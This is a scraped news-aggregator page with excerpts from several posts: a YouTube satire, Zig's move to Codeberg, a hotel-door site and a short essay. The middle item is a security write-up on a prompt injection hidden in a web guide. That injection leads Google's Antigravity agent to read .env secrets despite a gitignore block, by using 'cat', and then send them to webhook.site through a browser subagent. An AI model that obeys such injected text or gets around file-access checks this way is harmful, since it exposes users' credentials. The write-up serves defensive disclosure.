const cacheKey = `alsoReadCache:${link}`;

const up­date­Card = (title, im­age) => {

card.query­S­e­lec­tor(‘.also-read-ti­tle’).in­ner­Text = ti­tle;

card.query­S­e­lec­tor(‘.also-read-im­age’).style.back­groundIm­age = `url(${image})`;

let cached­Data;

try {

cached­Data = lo­cal­Stor­age.getItem(cacheKey);

if (cachedData) {

cached­Data = JSON.parse(cachedData);

} catch(e) {

con­sole.er­ror(“Er­ror pars­ing cache data:”, e);

cached­Data = null;

if (cachedData && Date.now() - cached­Data.time­stamp < CACHE_TTL) {

up­date­Card(cached­Data.ti­tle, cached­Data.im­age);

re­turn;

fetch(link)

.then(response => {

if (!response.ok) throw new Error(‘Network re­sponse was not ok’);

re­turn re­sponse.text();

.then(html => {

const doc = new DOMParser().parseFromString(html, text/html”);

const ogTi­tle = doc.query­S­e­lec­tor(‘meta[prop­erty=“og:ti­tle”]’)?.con­tent || Read More”;

const ogIm­age = doc.query­S­e­lec­tor(‘meta[prop­erty=“og:im­age”]’)?.con­tent || https://​via.place­holder.com/​300;

lo­cal­Stor­age.setItem(cacheKey, JSON.stringify({

ti­tle: ogTi­tle,

im­age: ogIm­age,

time­stamp: Date.now()

up­date­Card(ogTi­tle, ogIm­age);

.catch(error => {

con­sole.er­ror(“Er­ror fetch­ing Open Graph data:”, er­ror);

if (cachedData) {

up­date­Card(cached­Data.ti­tle, cached­Data.im­age);

})(document.currentScript.parentElement);

.also-read-card {

max-width: 600px;

width: 100%;

mar­gin: 20px 0;

bor­der: 1px solid #e0e0e0;

bor­der-left: 8px solid #5170ff;

bor­der-ra­dius: 6px;

over­flow: hid­den;

back­ground: #fff;

box-shadow: 0 1px 5px rgba(0,0,0,0.08);

tran­si­tion: box-shadow 0.3s ease;

dis­play: flex;

align-items: stretch;

.also-read-link {

dis­play: flex;

align-items: stretch;

text-dec­o­ra­tion: none;

color: in­herit;

width: 100%;

.also-read-image {

width: 150px;

height: 100%;

flex-shrink: 0;

back­ground-size: cover;

back­ground-po­si­tion: cen­ter;

/* Note: back­ground-im­age tran­si­tions might not an­i­mate as ex­pected */

.also-read-info {

padding: 15px;

flex-grow: 1;

dis­play: flex;

flex-di­rec­tion: col­umn;

jus­tify-con­tent: cen­ter;

.also-read-label {

dis­play: block;

font-size: 16px;

font-weight: 800;

let­ter-spac­ing: 1px;

color: #5170ff;

mar­gin-bot­tom: 4.15px;

.also-read-title {

font-size: 18px;

font-weight: 500;

color: #333;

mar­gin: 0;

line-height: 1.3;

dis­play: block;

/* Responsive Styles */

@media screen and (max-width: 768px) {

.also-read-card {

max-width: 90%;

mar­gin: 15px 0;

.also-read-image {

width: 120px;

.also-read-info {

...

Read the original on scienceclock.com »

5 901 shares, 30 trendiness

Someone At YouTube Needs Glasses

In my re­cent analy­sis of YouTube’s in­for­ma­tion den­sity I in­cluded the re­sults from an ad­vanced sta­tis­ti­cal analy­sis on the num­ber of videos pre­sent on the home page, which pro­jected that around May 2026 there would only be one lonely video on the home screen.

Amazingly, a dis­grun­tled Googler leaked a record­ing of how YouTube’s PM

org han­dled the crit­i­cism as it sat at the

top of Hacker News for a whole day for some rea­son.

The net re­sult is that af­ter months of hard work by YouTube en­gi­neers, the other day I fired up YouTube on an Apple TV and was graced with this:

Let’s an­a­lyze this pic­ture and count the num­ber of videos on the home screen:

Unfortunately the YouTube PM org’s my­opia is ac­cel­er­at­ing: with this data I now pro­ject that there will be zero videos on the home­screen around May of 2026 now, up from September.

Apparently Poe’s Law ap­plies to Google PMs, satire is dead, and maybe our manda­tory NeuraLinks are com­ing sooner than I thought.

...

Read the original on jayd.ml »

6 858 shares, 35 trendiness

Migrating from GitHub to Codeberg

Ever since git init ten years ago, Zig has been hosted on GitHub. Unfortunately, when it sold out to Microsoft, the clock started tick­ing. Please just give me 5 years be­fore every­thing goes to shit,” I thought to my­self. And here we are, 7 years later, liv­ing on bor­rowed time.

Putting aside GitHub’s re­la­tion­ship with ICE, it’s abun­dantly clear that the en­gi­neer­ing ex­cel­lence that cre­ated GitHub’s suc­cess is no longer dri­ving it. Priorities and the en­gi­neer­ing cul­ture have rot­ted, leav­ing users in­flicted with some kind of bloated, buggy JavaScript frame­work in the name of progress. Stuff that used to be snappy is now slug­gish and of­ten en­tirely bro­ken.

Most im­por­tantly, Actions has in­ex­cus­able bugs while be­ing com­pletely ne­glected. After the CEO of GitHub said to embrace AI or get out”, it seems the lack­eys at Microsoft took the hint, be­cause GitHub Actions started vibe-scheduling”; choos­ing jobs to run seem­ingly at ran­dom. Combined with other bugs and in­abil­ity to man­u­ally in­ter­vene, this causes our CI sys­tem to get so backed up that not even mas­ter branch com­mits get checked.

Rather than wast­ing do­na­tion money on more CI hard­ware to work around this crum­bling in­fra­struc­ture, we’ve opted to switch Git host­ing providers in­stead.

As a bonus, we look for­ward to fewer vi­o­la­tions (exhibit A, B, C) of our strict no LLM / no AI pol­icy, which I be­lieve are at least in part due to GitHub ag­gres­sively push­ing the file an is­sue with Copilot” fea­ture in every­one’s face.

The only con­cern we have in leav­ing GitHub be­hind has to do with GitHub Sponsors. This prod­uct was key to Zig’s early fundrais­ing suc­cess, and it re­mains a large por­tion of our rev­enue to­day. I can’t thank Devon Zuegel enough. She ap­peared like an an­gel from heaven and sin­gle-hand­edly made GitHub into a vi­able source of in­come for thou­sands of de­vel­op­ers. Under her lead­er­ship, the fu­ture of GitHub Sponsors looked bright, but sadly for us, she, too, moved on to big­ger and bet­ter things. Since she left, that prod­uct as well has been ne­glected and is al­ready start­ing to de­cline.

Although GitHub Sponsors is a large frac­tion of Zig Software Foundation’s do­na­tion in­come, we con­sider it a li­a­bil­ity. We humbly ask if you, reader, are cur­rently do­nat­ing through GitHub Sponsors, that you con­sider mov­ing your re­cur­ring do­na­tion to Every.org, which is it­self a non-profit or­ga­ni­za­tion.

As part of this, we are sun­set­ting the GitHub Sponsors perks. These perks are things like get­ting your name onto the home page, and get­ting your name into the re­lease notes, based on how much you do­nate monthly. We are work­ing with the folks at Every.org so that we can of­fer the equiv­a­lent perks through that plat­form.

Effective im­me­di­ately, I have made ziglang/​zig on GitHub read-only, and the canon­i­cal ori­gin/​mas­ter branch of the main Zig pro­ject repos­i­tory is https://​code­berg.org/​ziglang/​zig.git.

Thank you to the Forgejo con­trib­u­tors who helped us with our is­sues switch­ing to the plat­form, as well as the Codeberg folks who worked with us on the mi­gra­tion - in par­tic­u­lar Earl Warren, Otto, Gusted, and Mathieu Fenniak.

In the end, we opted for a sim­ple strat­egy, side­step­ping GitHub’s ag­gres­sive ven­dor lock-in: leave the ex­ist­ing is­sues open and un­mi­grated, but start count­ing is­sues at 30000 on Codeberg so that all is­sue num­bers re­main un­am­bigu­ous. Let us please con­sider the GitHub is­sues that re­main open as metaphor­i­cally copy-on-write”. Please leave all your ex­ist­ing GitHub is­sues and pull re­quests alone. No need to move your stuff over to Codeberg un­less you need to make ed­its, ad­di­tional com­ments, or re­base. We’re still go­ing to look at the al­ready open pull re­quests and is­sues; don’t worry.

In this mod­ern era of ac­qui­si­tions, weak an­titrust reg­u­la­tions, and plat­form cap­i­tal­ism lead­ing to ex­treme con­cen­tra­tions of wealth, non-prof­its re­main a bas­tion de­fend­ing what re­mains of the com­mons.

...

Read the original on ziglang.org »

7 765 shares, 29 trendiness

Bring Back Doors

I’m done. I’m done ar­riv­ing at ho­tels and dis­cov­er­ing that they have re­moved the bath­room door. Something that should be as stan­dard as hav­ing a bed, has been sac­ri­ficed in the name of aesthetic”.

I get it, you can save on ma­te­r­ial costs and make the room feel big­ger, but what about my dig­nity??? I can’t save that when you don’t in­clude a bath­room door.

It’s why I’ve built this web­site, where I com­piled ho­tels that are guar­an­teed to have bath­room doors, and ho­tels that need to work on pri­vacy.

I’ve emailed hun­dreds of ho­tels and I asked them two things: do your doors close all the way, and are they made of glass? Everyone that says yes to their doors clos­ing, and no to be­ing made of glass has been sorted by price range and city for you to eas­ily find places to stay that are guar­an­teed to have a bath­room door.

Quickly check to see if the ho­tel you’re think­ing of book­ing has been re­ported as lack­ing in doors by a pre­vi­ous guest.

Finally, this pas­sion pro­ject could not ex­ist with­out peo­ple sub­mit­ting ho­tels with­out bath­room doors for pub­lic sham­ing. If you’ve stayed at a door­less ho­tel send me an email with the ho­tel name to bring­back­doors@gmail.com, or send me a DM on Instagram with the ho­tel name and a photo of the door­less setup to be pub­licly posted.

Let’s name and shame these ho­tels to pro­tect the dig­nity of fu­ture trav­el­ers.

...

Read the original on bringbackdoors.com »

8 727 shares, 27 trendiness

Google Antigravity Exfiltrates Data

An in­di­rect prompt in­jec­tion in an im­ple­men­ta­tion blog can ma­nip­u­late Antigravity to in­voke a ma­li­cious browser sub­agent in or­der to steal cre­den­tials and sen­si­tive code from a user’s IDE.

An in­di­rect prompt in­jec­tion in an im­ple­men­ta­tion blog can ma­nip­u­late Antigravity to in­voke a ma­li­cious browser sub­agent in or­der to steal cre­den­tials and sen­si­tive code from a user’s IDE.

Antigravity is Google’s new agen­tic code ed­i­tor. In this ar­ti­cle, we demon­strate how an in­di­rect prompt in­jec­tion can ma­nip­u­late Gemini to in­voke a ma­li­cious browser sub­agent in or­der to steal cre­den­tials and sen­si­tive code from a user’s IDE.

Google’s ap­proach is to in­clude a dis­claimer about the ex­ist­ing risks, which we ad­dress later in the ar­ti­cle.

Let’s con­sider a use case in which a user would like to in­te­grate Oracle ERPs new Payer AI Agents into their ap­pli­ca­tion, and is go­ing to use Antigravity to do so.

In this at­tack chain, we il­lus­trate that a poi­soned web source (an in­te­gra­tion guide) can ma­nip­u­late Gemini into (a) col­lect­ing sen­si­tive cre­den­tials and code from the user’s work­space, and (b) ex­fil­trat­ing that data by us­ing a browser sub­agent to browse to a ma­li­cious site.

Note: Gemini is not sup­posed to have ac­cess to .env files in this sce­nario (with the de­fault set­ting Allow Gitignore Access > Off’). However, we show that Gemini by­passes its own set­ting to get ac­cess and sub­se­quently ex­fil­trate that data.

The user pro­vides Gemini with a ref­er­ence im­ple­men­ta­tion guide they found on­line for in­te­grat­ing Oracle ERPs new AI Payer Agents fea­ture.

Antigravity opens the ref­er­enced site and en­coun­ters the at­tack­er’s prompt in­jec­tion hid­den in 1 point font.

Collect code snip­pets and cre­den­tials from the user’s code­base.

b. Create a dan­ger­ous URL us­ing a do­main that  al­lows an at­tacker to cap­ture net­work traf­fic logs and ap­pend cre­den­tials and code snip­pets to the re­quest.

c. Activate a browser sub­agent to ac­cess the ma­li­cious URL, thus ex­fil­trat­ing the data.

Gemini is ma­nip­u­lated by the at­tack­er’s in­jec­tion to ex­fil­trate con­fi­den­tial .env vari­ables.

Gemini reads the prompt in­jec­tion: Gemini in­gests the prompt in­jec­tion and is ma­nip­u­lated into be­liev­ing that it must col­lect and sub­mit data to a fic­ti­tious tool’ to help the user un­der­stand the Oracle ERP in­te­gra­tion.

b. Gemini gath­ers data to ex­fil­trate: Gemini be­gins to gather con­text to send to the fic­ti­tious tool. It reads the code­base and then at­tempts to ac­cess cre­den­tials stored in the .env file as per the at­tack­er’s in­struc­tions.

c. Gemini by­passes the .gitignore file ac­cess pro­tec­tions: The user has fol­lowed a com­mon prac­tice of stor­ing cre­den­tials in a .env file, and has the .env file listed in their .gitignore file. With the de­fault con­fig­u­ra­tion for Agent Gitignore Access, Gemini is pre­vented from read­ing the cre­den­tial file.

This does­n’t stop Gemini. Gemini de­cides to work around this pro­tec­tion us­ing the cat’ ter­mi­nal com­mand to dump the file con­tents in­stead of us­ing its built-in file read­ing ca­pa­bil­ity that has been blocked.

D. Gemini con­structs a URL with the user’s cre­den­tials and an at­tacker-mon­i­tored do­main: Gemini builds a ma­li­cious URL per the prompt in­jec­tion’s in­struc­tions by URL en­cod­ing the cre­den­tials and code­base snip­pets (e.g., re­plac­ing char­ac­ters like spaces that would make a URL in­valid), and ap­pend­ing it to a web­hook.site do­main that is mon­i­tored by the at­tacker.

E. Gemini ex­fil­trates the data via the browser sub­agent: Gemini in­vokes a browser sub­agent per the prompt in­jec­tion, in­struct­ing the sub­agent to open the dan­ger­ous URL that con­tains the user’s cre­den­tials.

This step re­quires that the user has set up the browser tools fea­ture. This is one of the flag­ship fea­tures of Antigravity, al­low­ing Gemini to it­er­ate on its de­signs by open­ing the ap­pli­ca­tion it is build­ing in the browser.

Note: This at­tack chain show­cases ma­nip­u­la­tion of the new Browser tools, but we found three ad­di­tional data ex­fil­tra­tion vul­ner­a­bil­i­ties that did not rely on the Browser tools be­ing en­abled.

When Gemini cre­ates a sub­agent in­structed to browse to the ma­li­cious URL, the user may ex­pect to be pro­tected by the Browser URL Allowlist.

However, the de­fault Allowlist pro­vided with Antigravity in­cludes webhook.site’. Webhook.site al­lows any­one to cre­ate a URL where they can mon­i­tor re­quests to the URL.

So, the sub­agent com­pletes the task.

3. When the ma­li­cious URL is opened by the browser sub­agent, the cre­den­tials and code stored URL are logged to the web­hook.site ad­dress con­trolled by the at­tacker. Now, the at­tacker can read the cre­den­tials and code.

During Antigravity’s on­board­ing, the user is prompted to ac­cept the de­fault rec­om­mended set­tings shown be­low.

These are the set­tings that, amongst other things, con­trol when Gemini re­quests hu­man ap­proval. During the course of this at­tack demon­stra­tion, we clicked next”, ac­cept­ing these de­fault set­tings.

This con­fig­u­ra­tion al­lows Gemini to de­ter­mine when it is nec­es­sary to re­quest a hu­man re­view for Gemini’s plans.

This con­fig­u­ra­tion al­lows Gemini to de­ter­mine when it is nec­es­sary to re­quest a hu­man re­view for com­mands Gemini will ex­e­cute.

One might note that users op­er­at­ing Antigravity have the op­tion to watch the chat as agents work, and could plau­si­bly iden­tify the ma­li­cious ac­tiv­ity and stop it.

However, a key as­pect of Antigravity is the Agent Manager’ in­ter­face. This in­ter­face al­lows users to run mul­ti­ple agents si­mul­ta­ne­ously and check in on the dif­fer­ent agents at their leisure.

Under this model, it is ex­pected that the ma­jor­ity of agents run­ning at any given time will be run­ning in the back­ground with­out the user’s di­rect at­ten­tion. This makes it highly plau­si­ble that an agent is not caught and stopped be­fore it per­forms a ma­li­cious ac­tion as a re­sult of en­coun­ter­ing a prompt in­jec­tion.

A lot of AI com­pa­nies are opt­ing for this dis­claimer rather than mit­i­gat­ing the core is­sues. Here is the warn­ing users are shown when they first open Antigravity:

Given that (1) the Agent Manager is a star fea­ture al­low­ing mul­ti­ple agents to run at once with­out ac­tive su­per­vi­sion and (2) the rec­om­mended hu­man-in-the-loop set­tings al­low the agent to choose when to bring a hu­man in to re­view com­mands, we find it ex­tremely im­plau­si­ble that users will re­view every agent ac­tion and ab­stain from op­er­at­ing on sen­si­tive data. Nevertheless, as Google has in­di­cated that they are al­ready aware of data ex­fil­tra­tion risks ex­em­pli­fied by our re­search, we did not un­der­take re­spon­si­ble dis­clo­sure.

...

Read the original on www.promptarmor.com »

9 716 shares, 30 trendiness

All it takes is for one to work out

More than a decade ago, when I was ap­ply­ing to grad­u­ate school, I went through a pe­riod of deep un­cer­tainty. I had tried the pre­vi­ous year and had­n’t got­ten in any­where. I wanted to try again, but I had a lot go­ing against me.

I’d spent most of my un­der­grad build­ing a stu­dent job-por­tal startup and had­n’t bal­anced it well with aca­d­e­mics. My GPA needed ex­plain­ing. My GMAT score was just okay. I did­n’t come from a big-brand em­ployer. And there was no short­age of peo­ple with sim­i­lar or stronger pro­files ap­ply­ing to the same schools.

Even though I had learned a few things from the first round, the sec­ond at­tempt was still dif­fi­cult. There were mul­ti­ple points af­ter I sub­mit­ted ap­pli­ca­tions where I lost hope.

But dur­ing that stretch, a friend and col­league kept re­peat­ing one line to me:

All it takes is for one to work out.”

He’d say it every time I spi­raled. And as much as it made me smile, a big part of me did­n’t fully be­lieve it. Still, it be­came a lit­tle maxim be­tween us. And even­tu­ally, he was right — that one did work out. And it changed my life.

I’ve thought about that fram­ing so many times since then.

You don’t need every job to choose you. You just need the one that’s the right fit.

You don’t need every house to ac­cept your of­fer. You just need the one that feels like home.

You don’t need every per­son to want to build a life with you. You just need the one.

You don’t need ten uni­ver­si­ties to say yes. You just need the one that opens the right door.

These processes — col­lege ad­mis­sions, job searches, home buy­ing, find­ing a part­ner — can be emo­tion­ally bru­tal. They can get you down in ways that feel per­sonal. But in those mo­ments, that truth can be ground­ing.

All it takes is for one to work out.

And that one is all you need.

...

Read the original on alearningaday.blog »

10 713 shares, 29 trendiness

Boing

...

Read the original on boing.greg.technology »

To add this web app to your iOS home screen tap the share button and select "Add to the Home Screen".

10HN is also available as an iOS App

If you visit 10HN only rarely, check out the the best articles from the past week.

If you like 10HN please leave feedback and share

Visit pancik.com for more.